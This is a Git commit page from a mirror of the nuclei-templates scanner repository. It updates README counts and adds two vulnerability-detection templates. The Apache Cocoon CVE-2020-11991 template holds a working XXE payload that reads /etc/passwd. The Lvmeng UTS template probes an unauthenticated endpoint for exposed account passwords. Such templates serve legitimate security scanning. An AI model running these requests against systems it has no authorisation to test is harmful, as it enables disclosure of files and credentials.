daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #10 from projectdiscovery/master 

updation
patch-1
Dhiyaneshwaran 2021-02-13 23:51:07 +05:30 committed by GitHub
parent 45f694228c 1a621134bc
commit a52551fffe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 72 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
README.md
View File

@ -28,11 +28,11 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 176 | default-logins | 8 |
| cves | 177 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 44 |
| exposed-tokens | 9 | exposures | 45 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 40 |
| miscellaneous | 12 | misconfiguration | 43 |
| takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 |
@ -160,6 +160,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-1147.yaml
│   │   ├── CVE-2020-11710.yaml
│   │   ├── CVE-2020-11738.yaml
│   │   ├── CVE-2020-11991.yaml
│   │   ├── CVE-2020-12116.yaml
│   │   ├── CVE-2020-12720.yaml
│   │   ├── CVE-2020-13167.yaml
@ -367,6 +368,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── gmail-api-client-secrets.yaml
│   │   ├── htpasswd-detection.yaml
│   │   ├── laravel-env.yaml
│   │   ├── lvmeng-uts-disclosure.yaml
│   │   ├── magento-config.yaml
│   │   ├── opcache-status-exposure.yaml
│   │   ├── owncloud-config.yaml
@ -437,12 +439,14 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── exposed-service-now.yaml
│   ├── front-page-misconfig.yaml
│   ├── hadoop-unauth.yaml
│   ├── jboss-status.yaml
│   ├── jkstatus-manager.yaml
│   ├── jupyter-ipython-unauth.yaml
│   ├── kubernetes-pods.yaml
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── mikrotik-graph.yaml
│   ├── misconfigured-docker.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
@ -464,6 +468,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── tomcat-scripts.yaml
│   ├── unauthenticated-airflow.yaml
│   ├── unauthenticated-nacos-access.yaml
│   ├── unauthenticated-prtg.yaml
│   ├── wamp-xdebug-detect.yaml
│   └── zenphoto-installation-sensitive-info.yaml
├── takeovers
@ -632,7 +637,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**56 directories, 529 files**.
**56 directories, 534 files**.
📖 Documentation
-----

32
cves/2020/CVE-2020-11991.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
requests:
- method: POST
path:
- "{{BaseURL}}/v2/api/product/manger/getInfo"
headers:
Content-type: "text/xml"
body: |
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

31
exposures/configs/lvmeng-uts-disclosure.yaml Normal file
View File

@ -0,0 +1,31 @@
id: lvmeng-uts-disclosure
info:
name: Lvmeng UTS Disclosure
author: pikpikcu
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/webapi/v1/system/accountmanage/account"
headers:
Content-Type: application/json
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "password"
- "nsfocus_uts"
- "MANAGER_IP"
condition: and
part: body